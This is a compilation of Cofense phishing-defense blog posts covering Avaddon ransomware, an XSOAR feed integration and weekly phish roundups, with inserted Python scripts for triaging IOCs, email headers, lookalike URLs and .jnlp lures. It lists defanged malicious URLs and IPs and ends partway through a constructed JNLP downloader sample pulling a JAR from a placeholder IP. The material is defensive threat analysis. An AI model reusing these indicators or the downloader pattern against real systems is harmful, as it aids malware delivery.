Avaddon Ransomware Joins Data Exfiltration Trend

By Aaron Riley, Cofense Intelligence

Summary 

A new attack pattern indicates that another ransomware family is expanding into data exfiltration. Ransomware traditionally forces victims to pay to recover their encrypted data. However, a growing number of ransomware operations are adding pressure with data exfiltration: victims who do not pay the ransom will have their data exposed publicly. Avaddon, a ransomware as a service (RaaS) that emerged this summer, is the latest family to join this trend, and its operators are almost certainly gearing up to leak the sensitive data of victims who do not quickly pay.

Avaddon caught our attention in June when the Trik botnet started sending it to a broad set of targets, signaling threat actors’ willingness to cast a wider net in search of ransom payments. More recently, security researchers indicated that the operators of Avaddon set up a data leak website to publish stolen data if victims fail to pay the ransom. Cofense Intelligence is now seeing a campaign that combines Avaddon with an information stealer, indicating that threat actors are preparing to make use of this new extortion feature. The campaign has successfully evaded secure email gateways (SEGs) and targets several different industries, as discussed in detail below. 

Figure 1: Avaddon ransomware data dump webpage.

Smoke Loader Delivers Avaddon and Raccoon Stealer 

The email in Figure 2 is part of a campaign that attempts to encrypt the victim’s computer with Avaddon ransomware. Spoofing the FedEx brand and using a shipping theme, this phishing campaign starts with a malicious embedded link that has evaded some SEGs. When a user clicks the link, it downloads a malicious program, Smoke Loader, which in turn delivers a two-part attack to the victim’s machine. The attack combines Avaddon with Raccoon Stealer, which performs the data theft and exfiltration portion of the campaign.

Figure 2: Phishing email with an embedded link leading to a sample of Smoke Loader.

Data Exfiltration Increases Pressure, Adds Risk 

The exfiltration of sensitive data can be damaging to an organization and carry heavy legal, financial and reputational consequences, which is why threat actors use it as leverage for extortion payments. In this instance, Raccoon Stealer provided the data theft and exfiltration capability that is not built into the Avaddon ransomware itself. Considering that Avaddon is a RaaS, it is consistent for its operators to employ a malware as a service (MaaS), Raccoon Stealer, to add features. Using a MaaS sample as the data exfiltration component also lets the threat actors swap in other MaaS families as needed. Combining these two services with a successful delivery mechanism such as Smoke Loader creates an attack that is both more lucrative for threat actors and more harmful to victims.

With these most recent developments, Avaddon has joined a few other ransomware families in adding data exfiltration to use as leverage for extortion payments. The campaign shown in Figure 2 continued the trend of broad targeting—it was sent to a wide range of industries including energy, healthcare, insurance, manufacturing, mining and retail. As Avaddon sees increasing success from these efforts, we can expect more ransomware operators to follow suit. 

Diligent backups will no longer suffice to save an organization from a ransomware incident if sensitive or confidential data has been exfiltrated. Not only can the organization be reputationally damaged by a data leak; depending on the laws and regulations governing the data, it may also be subject to fines and penalties. Data owners or regulators can potentially hold the organization liable and pursue legal recourse, exacerbating the cost of the ransomware incident.

In conclusion, we predict that the most dangerous part of ransomware to organizations soon will be data exfiltration. 

Not a Cofense Intelligence customer? Learn how our phishing alerts help mitigate today’s dynamic threats. 

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc. 

Humans and Machines – Phishing Mitigation Automation SOARing to New Heights

By Mike Saurbaugh

Cofense and Palo Alto Networks Cortex XSOAR integrate to counter phishing threats that evade secure email gateways (SEGs). Human-verified phishing indicators and automation squelch attackers. Cofense Intelligence, Cofense Triage and Cortex XSOAR combine to support SOCs in the fight against phish.

Conditioning employees to detect and report suspicious email is a strategy security leaders have adopted to protect the business and empower employees to become a defensive asset. As phishing emails evade secure email gateways (SEG), employees are the last line of defense and can be the difference between detection and response or an incident that leads to a breach. Cofense Triage ingests employee-reported suspicious email, allowing security teams to quickly assess and respond to threats. Cofense Intelligence is human-verified phishing intelligence powering security teams to respond to credible phishing threats.

Cofense Intelligence: What is Human-Verified Phishing Intelligence and Why Should I Care?

Cofense Intelligence is phishing-specific threat intelligence. Human-verified means that the Cofense intelligence and labs teams have vetted the indicators prior to consumption by customers. This ensures high-fidelity upon ingestion. Domains, URLs, IPs and hashes all have a corresponding impact rating that follows STIX. Major, moderate, minor and none ratings are applied to phishing indicators. This means that each indicator provided carries an impact rating so security teams can make educated decisions on what action to take.

A major impact-rating URL that was vetted by a seasoned security professional tells the customer that this URL is indeed malicious and should not be accessed. Knowing this allows the security team to implement a block rule in the firewall to prevent employees from reaching a harmful link. Likewise, a suspicious domain may warrant an alert rather than a block. The point is that security professionals can implement such rules through automation with more confidence, given the rigor of human vetting.

Machine-Readable and Human-Readable Phishing Intelligence

Cofense Intelligence provides context for analysts. Not just what’s bad, but what’s bad and why.

Cofense Intelligence is delivered as JSON, STIX or CEF, so SOARs, threat intelligence platforms (TIPs) and SIEMs can poll for updates on an interval; Cofense publishes indicators as soon as they have been vetted.

The end result is a cadence of polling machine-readable indicators to be leveraged in security solutions with the context to understand the phishing threat and its potential impact to the business.

Actionable Machine-Readable Intelligence

The following output shows the key fields to use in threat lookup validation, security solution integrations and threat hunting.

{
  "success" : true,
  "data" : {
    "id" : 39377,
    "relatedSearchTags" : [ ],
    "feeds" : [ {
      "id" : 23,
      "permissions" : {
        "WRITE" : false,
        "READ" : true,
        "OWNER" : false
      },
      "displayName" : "Cofense"
    } ],
    "blockSet" : [ {
      "malwareFamily" : {
        "familyName" : "NetWire Remote Access Trojan",
        "description" : "The Netwire RAT is used to take control of a user’s system, it has many capabilities including the ability to use a victim\u0027s computer as a proxy and keylogging functionality that extends to peripheral devices such as USB card readers."
      },
      "impact" : "Major",
      "blockType" : "URL",
      "role" : "C2",
      "roleDescription" : "Command and control location used by malware",
      "data" : "hxxp://ddns[.]whsthings[.]xyz:4598",
      "data_1" : {
        "url" : "hxxp://ddns[.]whsthings[.]xyz:4598",
        "domain" : "whsthings[.]xyz",
        "path" : "",
        "protocol" : "http",
        "host" : "ddns[.]whsthings[.]xyz"
      }
    }, {
      "deliveryMechanism" : {
        "mechanismName" : "CVE-2017-11882",
        "description" : "Microsoft Office exploit taking advantage of flaw in Microsoft Equation Editor allowing for arbitrary code execution"
      },
      "impact" : "Major",
      "blockType" : "URL",
      "role" : "InfURL",
      "roleDescription" : "URL provided in email as means for infection",
      "data" : "hxxp://price2day[.]pk/CREDIT_NOTE_592609225.xlsx",
      "data_1" : {
        "url" : "hxxp://price2day[.]pk/CREDIT_NOTE_592609225.xlsx",
        "domain" : "price2day.pk",
        "path" : "/CREDIT_NOTE_592609225.xlsx",
        "protocol" : "http",
        "host" : "price2day[.]pk"
      }
    }, {
      "malwareFamily" : {
        "familyName" : "NetWire Remote Access Trojan",
        "description" : "The Netwire RAT is used to take control of a user’s system, it has many capabilities including the ability to use a victim\u0027s computer as a proxy and keylogging functionality that extends to peripheral devices such as USB card readers."
      },
      "impact" : "Major",
      "blockType" : "Domain Name",
      "role" : "C2",
      "roleDescription" : "Command and control location used by malware",
      "data" : "ddns[.]whsthings[.]xyz",
      "data_1" : "ddns[.]whsthings[.]xyz"
    } ]
  }
}

Figure 1: Machine-readable JSON output
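The blockSet entries above are what an integration actually consumes. As an added example (this is not Cofense code and not the Cofense API client), the Python below takes a report in the shape of Figure 1, keeps entries at or above a chosen impact rating, refangs the indicators and groups them by blockType so each list can be handed to the matching control (URL filter, DNS sinkhole). It assumes the feed defangs indicators with hxxp:// and [.] exactly as the figure shows; SAMPLE_REPORT is a constructed excerpt of that figure plus one Minor entry so the filter has something to drop.

```python
"""Build per-type block lists from a Cofense Intelligence-style threat report.

Added example; this is not Cofense code and not the Cofense API client.
It assumes the JSON shape shown in Figure 1 (data.blockSet[] entries with
impact, blockType, role and data) and that indicators are defanged with
hxxp:// and [.] as the figure shows. SAMPLE_REPORT is a constructed excerpt.
"""
import json
import re
from collections import defaultdict

# Constructed sample in the shape of the Figure 1 output; the last entry is
# added so the impact filter has something to drop.
SAMPLE_REPORT = json.dumps({
    "success": True,
    "data": {
        "id": 39377,
        "blockSet": [
            {"malwareFamily": {"familyName": "NetWire Remote Access Trojan"},
             "impact": "Major", "blockType": "URL", "role": "C2",
             "data": "hxxp://ddns[.]whsthings[.]xyz:4598"},
            {"deliveryMechanism": {"mechanismName": "CVE-2017-11882"},
             "impact": "Major", "blockType": "URL", "role": "InfURL",
             "data": "hxxp://price2day[.]pk/CREDIT_NOTE_592609225.xlsx"},
            {"malwareFamily": {"familyName": "NetWire Remote Access Trojan"},
             "impact": "Major", "blockType": "Domain Name", "role": "C2",
             "data": "ddns[.]whsthings[.]xyz"},
            {"impact": "Minor", "blockType": "Domain Name", "role": "InfURL",
             "data": "example[.]org"},
        ],
    },
})

IMPACT_RANK = {"None": 0, "Minor": 1, "Moderate": 2, "Major": 3}


def refang(indicator: str) -> str:
    """Undo the hxxp:// and [.] defanging (assumed to match the feed)."""
    indicator = re.sub(r"^hxxp(s?)://", r"http\1://", indicator, flags=re.IGNORECASE)
    return indicator.replace("[.]", ".")


def block_lists(report_json: str, min_impact: str = "Major") -> dict:
    """Return {blockType: [refanged indicators]} at or above min_impact.

    A report with success=false raises instead of returning an empty dict,
    so a failed poll never silently unblocks anything downstream.
    """
    report = json.loads(report_json)
    if not report.get("success"):
        raise ValueError("report did not succeed; refusing to build block lists")
    threshold = IMPACT_RANK[min_impact]
    lists = defaultdict(list)
    for entry in report["data"].get("blockSet", []):
        if IMPACT_RANK.get(entry.get("impact"), 0) < threshold:
            continue
        ioc = refang(entry["data"])
        bucket = lists[entry["blockType"]]
        if ioc not in bucket:            # the same IOC can appear under several roles
            bucket.append(ioc)
    return dict(lists)


def context_lines(report_json: str) -> list:
    """One 'what and why' line per entry, for the analyst's ticket."""
    lines = []
    for e in json.loads(report_json)["data"]["blockSet"]:
        family = (e.get("malwareFamily", {}).get("familyName")
                  or e.get("deliveryMechanism", {}).get("mechanismName")
                  or "unknown")
        lines.append(f"{e['impact']:<8} {e['role']:<7} {e['blockType']:<12} {e['data']}  ({family})")
    return lines


if __name__ == "__main__":
    for block_type, iocs in block_lists(SAMPLE_REPORT).items():
        print(block_type, iocs)
    print("\n".join(context_lines(SAMPLE_REPORT)))
```

The impact threshold is the policy knob: Major entries go straight to a block list, while Moderate and Minor ones are better routed to alerting, as the text above suggests. Refusing to act on a report whose success flag is false is deliberate; an empty result from a failed poll would otherwise look identical to "nothing to block".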

Contextual Human-Readable Intelligence
When understanding the phishing threat and its severity are critical, Cofense’s portal and reports provide insight.

Figure 2: Executive Summary from Cofense Intelligence Active Threat Report

Figure 3: One of Many URLs Involved in the Threat Report

Figure 4: Description of Command and Control Malware with a Link to WebUI 

Cortex XSOAR Threat Intel Management Supercharges SOCs

Cortex XSOAR takes a new approach with native threat intelligence management, unifying aggregation, scoring, and sharing of threat intelligence with playbook-driven automation. With Cortex XSOAR, analysts eliminate manual tasks with automated playbooks to aggregate, parse, deduplicate, and manage millions of daily indicators across dozens of supported sources. From here, analysts take charge of their threat intelligence with playbook-based indicator lifecycle management and transparent scoring that can be extended and customized with ease.

With analysts potentially spread across the globe, Cortex XSOAR boosts collaboration to reveal critical threats by layering third-party threat intelligence with internal incidents to prioritize alerts for smarter response decisions.

Reputable sources of intelligence enable automated action to shut down threats across more than 450 third-party products with purpose-built playbooks based on proven SOAR capabilities.

Additionally, analysts can save time by executing intel-based playbooks to expedite threat hunting across disparate security tools. In this way, security teams can identify, gain context for, and prioritize alerts to advanced and relevant threats.

Leveraging Cofense Intelligence in Cortex XSOAR

Human-verified Cofense Intelligence complements Cortex XSOAR’s threat intelligence management module. Analysts can automatically block phishing threats by aggregating, deduplicating and syndicating protection from indicators sourced from Cofense Intelligence and other feeds.

To ingest the JSON output shown earlier, analysts enable the Cofense feed in Cortex XSOAR, provided they have a valid Cofense Intelligence license.

Figure 5: Cofense Feed Integration Application Available in Cortex XSOAR

Within configuration settings, and because the intelligence feed is human-verified by Cofense, analysts can opt to set reliability to “completely reliable” and an indicator reputation as “bad.”

Figure 6: Cofense Intelligence Feed Configuration Settings

Cortex XSOAR’s dashboard is a quick and easy way to visualize Cofense Intelligence indicators.

Figure 7: Cortex XSOAR Threat Intelligence Management Dashboard – Cofense Intelligence Indicators

The URLs in this case can be assigned to an incident and attached to a playbook. The playbook can then, for example, push one or more of those URLs to a block list on the Palo Alto Networks Next-Generation Firewall.

Figure 8: URL Incident Remediation

Cofense Triage: Automating Analysis of Employee-Reported Phish

Security teams do their best to keep phish from making it to the employee’s mailbox. However, attackers are skilled at evading secure email gateways and other defenses. Cofense Triage ingests employee-reported phish to automatically uncover the latest attacks plaguing the enterprise.

Cofense pioneered phishing simulation to help organizations educate and condition employees to spot phish. Phishing simulation has been adopted by organizations worldwide and continues to be a staple of security programs.

Cofense Reporter empowers employees to report suspicious phish to the SOC so that they can analyze and respond to evasive perimeter phishing threats. A simple one-click feature in the email client is all that’s needed for employees to provide security teams with an additional source of intelligence.

Cofense Triage ingests and analyzes the reported emails, highlights real phish and removes benign messages mistakenly reported by employees. Cofense Triage benefits from Cofense Intelligence and several integrations, including Palo Alto Networks WildFire™.

Figure 9: Cofense Triage Infographic Workflow

Cofense Triage – An Enabler for Cortex XSOAR Playbooks

Cofense Triage APIs are accessible to Cortex XSOAR with an integration app to ingest processed phishing reports. This means that Cofense Triage and Cortex XSOAR customers can poll APIs from the application and assign to playbooks just as with Cofense Intelligence.

Analysts configure their app in Cortex XSOAR and ingest processed reports with designated threat indicators.

Figure 10: Cofense Triage Application in Cortex XSOAR

Figure 11: Cofense Triage Configuration – Assigning Incidents at Ingestion

Malicious Indicators Evading Secure Email Gateway

When employees report, security teams benefit. Take a look at malicious URLs and hashes as reported by conditioned employees who received phish and knew to report with Cofense Reporter.

Figure 12: Malicious Indicators in Cofense Triage

Cortex XSOAR Ingesting Threat Indicators from Cofense Triage

When a security analyst designates a file, URL or domain as malicious, they have vetted the threat as would Cofense’s Intelligence team. Knowing this, security professionals can ingest the indicators and allow them to run through a playbook for next step actions.

Figure 13: Ingested Malicious Hashes from Cofense Triage

Figure 14: Playbook Execution of Malicious File Attachment Reported by Employee

Multiple Sources of Intelligence in One View

Cortex XSOAR allows analysts to manipulate widgets to view all sources of intelligence or get more granular and investigate one source.

Figure 15: Dashboard View of Cofense Triage Feed

Secure email gateways and other security solutions are not impermeable. If your SOC is feeling the pain and is in need of some relief, Cofense and Cortex XSOAR bring that relief in seconds rather than days. When employee-reported and human-vetted sources of intelligence align, security teams can be more confident in their remedial actions. Whether it is endpoint or network-based remediation, or conducting a threat lookup to help make additional decisions, Cofense solutions complement the capabilities Cortex XSOAR offers to help customers centralize the security operation.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Cofense Announces Keynote Speakers for Virtual Submerge 2020

Leesburg, Va. – Aug. 20 – Cofense®, the global leader in intelligent phishing defense solutions, today released its speaker lineup and agenda details for Virtual Submerge 2020, the Global Phishing Defense Event of the Year. Set to take place virtually Sept. 22-23, Submerge will feature on-demand content focused on the latest trends in phishing attacks and phishing defense, specifically developed for individuals with security leadership, incident response, threat intelligence and security awareness responsibilities.

Featured keynote speaker Dmitri Alperovitch, Co-Founder and Chairman of Silverado Policy Accelerator and Co-Founder of Crowdstrike Inc., will join Cofense speakers Rohyt Belani, CEO and Co-Founder, Aaron Higbee, CTO and Co-Founder, and Keith Ibarguen, Chief Product Officer, to deliver thought-provoking keynote sessions. The Virtual Submerge 2020 agenda offers a variety of educational sessions and presentations that will examine the state of the industry’s phishing detection and response.

“On behalf of Cofense, I would like to thank our many speakers who each bring extremely valuable experience to share with our attendees – Virtual Submerge promises deeper, more hands-on content than ever before,” said Belani. “Sessions will arm attendees with the latest insights on how combining technology and human intelligence creates a network effect that can be leveraged to defend against threats and avoid a breach, while raising awareness of the ways malicious actors are actively targeting organizations every day.”

During the two-day event, Virtual Submerge will showcase information that security professionals can use to influence strategic planning and improve security operations. This includes the latest in phishing defense best practices, insights from global thought leaders on the current phishing threat landscape, and regionally focused snapshots into active threats that are targeting global businesses.

The following industry luminaries will also present during Virtual Submerge:

  • Nick Adams, GuideWire
  • Peter Crumpton, NFU Mutual
  • Jason Bohr and Ryan Praskovitch, Nationwide Insurance
  • Tony Fachaux, National Bank of Canada
  • JJ Hodges, Community Health Systems
  • Lisa Plaggemier, Media Pro
  • Susan Rassas, Shell Information Technology
  • Lori Temples & Elizabeth McConnell, GreenSky
  • Peter Vu, NRI Secure
  • Jeff Van Wingerden (CRISC), Sound Transit

“As the global phishing defense event of the year, it is our mission to bring the security community together for two days to emphasize the threat of phishing attacks. Whether you are a security executive, awareness professional or analyst, Virtual Submerge has breakout sessions designed specifically for you,” added Higbee. “Our team is committed to promoting unique perspectives on the evolving phishing threat landscape, and the most effective tools, techniques, and intelligence to stop phishing attacks in their tracks.”

Cofense’s network of over 20 million human sensors around the world empowers organizations with intelligence to rapidly stop phishing attacks, even after they have evaded Secure Email Gateway (SEG) technologies. To learn more about Virtual Submerge and to register, please visit https://cofense.com/submerge/.

About Cofense
Cofense®, the leading provider of intelligent phishing defense solutions worldwide, is uniting humanity against phishing. The Cofense suite of products combines timely attack intelligence on phishing threats that have evaded perimeter controls and were reported by employees, with best-in-class security operations technologies to stop attacks faster and stay ahead of breaches. Cofense customers include Global 1000 organizations in defense, energy, financial services, healthcare and manufacturing sectors that understand how changing user behavior will improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Media Contact

press@cofense.com

 

Phish Found in Proofpoint-Protected Environments – Week Ending August 16, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We note a preponderance of malware this week, both via attachment and image links. With security teams overloaded with phishing response, perhaps Cofense Intelligence can help?

Sample phish delivers a .xxe attachment that uses GuLoader to install the Remcos remote access trojan

TYPE: Malware – Remcos

DESCRIPTION: This phish reminds us of an important lesson: always do the needful. This does not include extracting the attached .xxe file, since that will execute GuLoader and download the Remcos Remote Access Trojan. And who needs that?

Sample phish uses an image link to deliver the Pyrogenic Stealer

TYPE: Malware – Pyrogenic Stealer

DESCRIPTION: It’s a good thing the confidentiality notice in this email absolves the sender of any virus being passed on. This payment-themed phish provides what looks like a poorly rendered PDF, but is instead an image with a link to a Pyrogenic Stealer download.

Sample phish uses an image link to deliver the NanoCore remote access trojan

TYPE: Malware – NanoCore

DESCRIPTION: Another image link designed to look like an attachment. This one includes a very friendly “DOWNLOAD” instruction. Very helpful if you’re looking to download the NanoCore Remote Access Trojan, something we saw resurface in March of 2018.

Sample phish in the Finnish language uses an embedded URL to deliver Agent Tesla

TYPE: Malware – Agent Tesla

DESCRIPTION: This phish is bad from start to finish (see what I did there?). Promising a shipping document with tracking number, it actually delivers a link to the Agent Tesla keylogger. Our Phish Fryday podcast gave it some good coverage earlier in the year.

Sample phish delivers the WSH remote access trojan with an embedded URL

TYPE: Malware – WSH RAT

DESCRIPTION: Hoping to keep your balance up to date? Be careful what you wish for. This payment-themed phish delivers a link to the WSH Remote Access Trojan. We discussed this variant of the Houdini Worm back in 2019.

Sample phish in Italian delivers a .jnlp file leading to the Ursnif malware

TYPE: Malware – Ursnif

DESCRIPTION: My Italian is a bit rusty. Ok, non-existent. But a translation tells me this is a refund from the Italian social security agency. The attached .jnlp shortcut file leads to a JAR Downloader that then installs and runs the Ursnif malware. We’ve seen Italian speakers targeted with Ursnif before.

Sample phish steals credentials with a Dropbox-hosted PDF

TYPE: Credential Theft

DESCRIPTION: You knew we wouldn’t make it through an entire post without a credential phish. This attack leverages trust in the Dropbox logo but actually uses Google Cloud Storage to host a linked PDF. The supposed “business proposal” will steal your credentials faster than you can say trusted cloud storage.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Phish Fryday – Phishing Defense Expertise

Identifying a phishing email is more than a yes/no, good/bad equation. If it’s bad, you need to know how bad it is. If my user clicked it, what happened? What do I need to do to protect my organization? Answering these questions requires a certain level of expertise with tools and strategies for analyzing malicious emails. Joining us this week is Cofense Director of Product Management Pete Smith to talk about the skills needed to break down an attack to understand the Indicators of Compromise that result from a successful attack.

Learn more:

Phishing attacks target locale-specific users

Cofense Submerge 2020 goes virtual

Cofense speaks with IMAX about phishing defense

Request access to Ask an Expert

Contact Pete Smith

Questions or comments? Reach us at phishfryday@cofense.com

Phishing Threat Preys on Desperate Business Owners

By Kyle Duncan and Noah Mizell, Cofense Phishing Defense Center

For the past few months, businesses across the nation have suffered from the financial strain brought on by COVID-19. Government relief has become a major concern as businesses struggle to stay afloat. The Cofense Phishing Defense Center (PDC) has taken notice of a new phishing campaign that once again aims to abuse Covid-related fear and uncertainty. This campaign imitates the U.S. Small Business Administration (SBA) to harvest the credentials of business owners who may be expecting the administration’s assistance.

While the spoofed address for this attack is one the SBA uses and is even listed on their website, one brief look at this example’s “Received” path shows it did not originate from the SBA.

Figure 1-2: Email Header

The first four hops on the email’s Received path show that it originated from mail servers in Japan. The same origin shows up in other header fields as well: the Japanese IP address appears in the Authentication-Results-Original header and, in some samples, the Japanese domain appears in the Message-ID.
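The header walk described above is easy to script so that every report of a lookalike sender gets the same check. The Python below is an added example, not part of the original post and not a Cofense tool: it parses the Received chain oldest-first, takes the first server that accepted the message as its origin, and compares that origin, the Message-ID domain and the SPF result against the From domain. RAW_MESSAGE is a constructed message: the hostnames, IPs (documentation ranges) and Message-ID are made up, and the sba.gov mailbox is a placeholder, not a real SBA address.

```python
"""Walk a message's Received chain and compare where it entered the mail
path with the domain it claims to be from.

Added example; not from the post and not a Cofense tool. RAW_MESSAGE is a
constructed message: hostnames, IPs and the Message-ID are made up (using
documentation address ranges), and the sba.gov mailbox is a placeholder
rather than a real SBA address.
"""
import email
import re
from email import policy

RAW_MESSAGE = b"""\
Received: from mx.victim-corp.example (mx.victim-corp.example [198.51.100.7])
\tby inbox.victim-corp.example with ESMTP; Mon, 10 Aug 2020 09:14:02 +0000
Received: from relay.example.jp (relay.example.jp [203.0.113.25])
\tby mx.victim-corp.example with ESMTPS; Mon, 10 Aug 2020 09:14:01 +0000
Received: from mail03.example.jp (unknown [203.0.113.44])
\tby relay.example.jp with ESMTP; Mon, 10 Aug 2020 09:13:59 +0000
Received: from [192.0.2.9] (unknown [192.0.2.9])
\tby mail03.example.jp with ESMTPA; Mon, 10 Aug 2020 09:13:58 +0000
Authentication-Results: mx.victim-corp.example; spf=fail smtp.mailfrom=sba.gov
Message-ID: <20200810091358.ABC123@mail03.example.jp>
From: "SBA Disaster Assistance" <placeholder@sba.gov>
To: owner@victim-corp.example
Subject: Review and proceed with your SBA loan application

Body omitted.
"""

# "from <name> (<comment>) by <host> ..." as written by most MTAs.
RECEIVED = re.compile(r"^from\s+(\S+)(?:\s+\(([^)]*)\))?\s+by\s+(\S+)", re.IGNORECASE)


def received_hops(raw: bytes) -> list:
    """Hops oldest-first as (from_name, from_comment, by_host).

    Each MTA prepends its own Received header, so the headers read
    newest-first; reversing gives the order the message actually travelled.
    Only the hops written by MTAs you control are trustworthy; anything
    below them can be forged by the sender.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED.match(" ".join(str(value).split()))   # unfold and collapse whitespace
        if m:
            hops.append((m.group(1), m.group(2) or "", m.group(3)))
    return hops


def same_org(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def origin_report(raw: bytes) -> dict:
    """Findings an analyst would note before calling the From address spoofed."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    addrs = msg["From"].addresses if msg["From"] else ()
    from_domain = addrs[0].domain.lower() if addrs else ""
    hops = received_hops(raw)
    origin_mta = hops[0][2].lower() if hops else ""       # first server that accepted it
    m = re.search(r"@([^>\s]+)", str(msg.get("Message-ID", "")))
    msgid_domain = m.group(1).lower() if m else ""
    auth = str(msg.get("Authentication-Results", "")).lower()

    findings = []
    if from_domain and origin_mta and not same_org(origin_mta, from_domain):
        findings.append(f"first MTA {origin_mta} is not under {from_domain}")
    if from_domain and msgid_domain and not same_org(msgid_domain, from_domain):
        findings.append(f"Message-ID domain {msgid_domain} is not under {from_domain}")
    if "spf=fail" in auth or "spf=softfail" in auth:
        findings.append("SPF failed for the envelope sender")
    return {"from_domain": from_domain, "origin_mta": origin_mta,
            "message_id_domain": msgid_domain, "findings": findings}


if __name__ == "__main__":
    for hop in received_hops(RAW_MESSAGE):
        print("from %-28s by %s" % (hop[0], hop[2]))
    for finding in origin_report(RAW_MESSAGE)["findings"]:
        print("!", finding)
```

The one caveat worth repeating: only the Received headers added by your own gateway are authoritative. A sender can prepend fake hops beneath them, so the origin the script reports is the earliest hop you have no reason to doubt, not proof of where the message really started.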

Figure 3-4: Email Body

The email body of this phish is very clean and well-constructed. Barring the excessive use of commas, the email looks legitimate at a glance. The threat actor has even compiled legitimate logo images and contact information to help sell the deception. Small business owners who have applied for federal aid would be hopeful and relieved to see this message in their inbox.

When you hover over the “Review and Proceed” button, however, the facade falls. Instead of sending users to SBA.gov, this button will redirect to the phishing page:

hXXps://ion-homes[.]com/sba/covid19relief/sba.gov/

The phishing page at this URL redirects to an SBA phishing login page with similar logo, positioning, and details to the real site. While the phishing domain differs, the threat actor has notably attempted to mirror the URL structure from the legitimate SBA’s login URL by tossing in ‘covid19relief’ into the directory name.
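Putting the impersonated brand's domain into the path is a recurring trick, and it is one the URL parser catches for you: the host is whatever comes before the first slash, regardless of what the path says. The Python below is an added example, not from the post, that flags a URL when a protected brand domain appears in its path or query, or inside a subdomain of an unrelated host; it goes slightly beyond the lure above by also covering the "sba.gov.evil.example" host form. The lookalike URL is the one reported in the post; the other sample URLs and the crude registered-domain helper are constructed for illustration.

```python
"""Flag URLs that carry a brand's domain in the path or in a subdomain
while the actual host belongs to someone else.

Added example; not from the post. BRANDS and the sample inputs below are
constructed; the first URL is the lookalike reported in the post.
"""
import re
from urllib.parse import urlsplit

BRANDS = ("sba.gov",)   # domains you expect only ever to see as the host


def refang(url: str) -> str:
    """Undo hXXp:// and [.] defanging so the URL parser sees a real URL."""
    url = re.sub(r"^h[xX]{2}p(s?)://", r"http\1://", url, flags=re.IGNORECASE)
    return url.replace("[.]", ".")


def registered_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels). Fine for .com/.gov; use a public
    suffix list in production so co.uk-style hosts are handled."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def analyze_url(url: str, brands=BRANDS) -> dict:
    u = urlsplit(refang(url))
    host = (u.hostname or "").lower()
    # The host is legitimate only if it IS the brand domain or a subdomain of it.
    legit = [b for b in brands if host == b or host.endswith("." + b)]
    in_path = [b for b in brands if b in (u.path + "?" + u.query).lower()]
    in_host = [b for b in brands if b in host and b not in legit]   # e.g. sba.gov.evil.example
    return {
        "host": host,
        "registered_domain": registered_domain(host),
        "brand_host": bool(legit),
        "brand_in_path": in_path,
        "brand_in_subdomain": in_host,
        "suspicious": bool(in_path or in_host) and not legit,
    }


if __name__ == "__main__":
    for sample in ("hXXps://ion-homes[.]com/sba/covid19relief/sba.gov/",
                   "https://www.sba.gov/funding-programs",
                   "https://sba.gov.example.net/login"):
        print(analyze_url(sample))
```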

Figure 5: Phishing Page

After entering their login credentials, users are redirected to the official SBA website, specifically its login page, as seen in Figure 6.

Figure 6: Official Small Business Administration Page

Instead of receiving aid, business owners who fall for the scam give away their credentials—adding insult to injury.

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops phishing attacks that elude email gateways.

Network IOC: hXXps://ion-homes[.]com/sba/covid19relief/sba.gov/
IP: 173.231.209.178

Phish Found in Proofpoint-Protected Environments – Week Ending August 9, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week sees a variety of the same ol’, same ol’. Logistics spoofs, trusted cloud storage, and finance themes. Good thing humans can be trained to detect these things.

Phishing example delivers a zipped .jnlp Java downloader to then deliver the Ursnif banking trojan

TYPE: Malware – Ursnif

DESCRIPTION: Threat actors in this connected age love to spoof logistics companies. This example warns of a package being returned to the sender. The attached, zipped .jnlp shortcut file leads to a JAR Downloader that runs the Ursnif malware. This is one package you do not want to receive.
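A .jnlp file is just XML: a codebase plus one or more jar hrefs that Java Web Start fetches and runs, which is why the Ursnif lures here (the Italian one in the previous week's post and the zipped one above) hand the victim a launcher rather than the payload itself. The Python below is an added example, not from either post and not a Cofense tool, that pulls the codebase, resolved JAR URLs, entry class and permission request out of a launcher, accepting either a bare .jnlp or a zip that contains one. SAMPLE_JNLP is constructed (documentation-range IPs, made-up file names); the real lures' contents are not shown on the page.

```python
"""Pull the remote code references out of a .jnlp lure, bare or zipped.

Added example; not from either post and not a Cofense tool. SAMPLE_JNLP
is constructed (documentation-range IPs, made-up file names) in the shape
of a typical Java Web Start launcher that pulls a JAR from the attacker's
server; the real lures' contents are not shown on the page.
"""
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urljoin

SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://203.0.113.5/files/" href="Rimborso.jnlp">
  <information><title>Rimborso</title><vendor>Agency</vendor></information>
  <security><all-permissions/></security>
  <resources>
    <j2se version="1.6+"/>
    <jar href="Downloader.jar" main="true"/>
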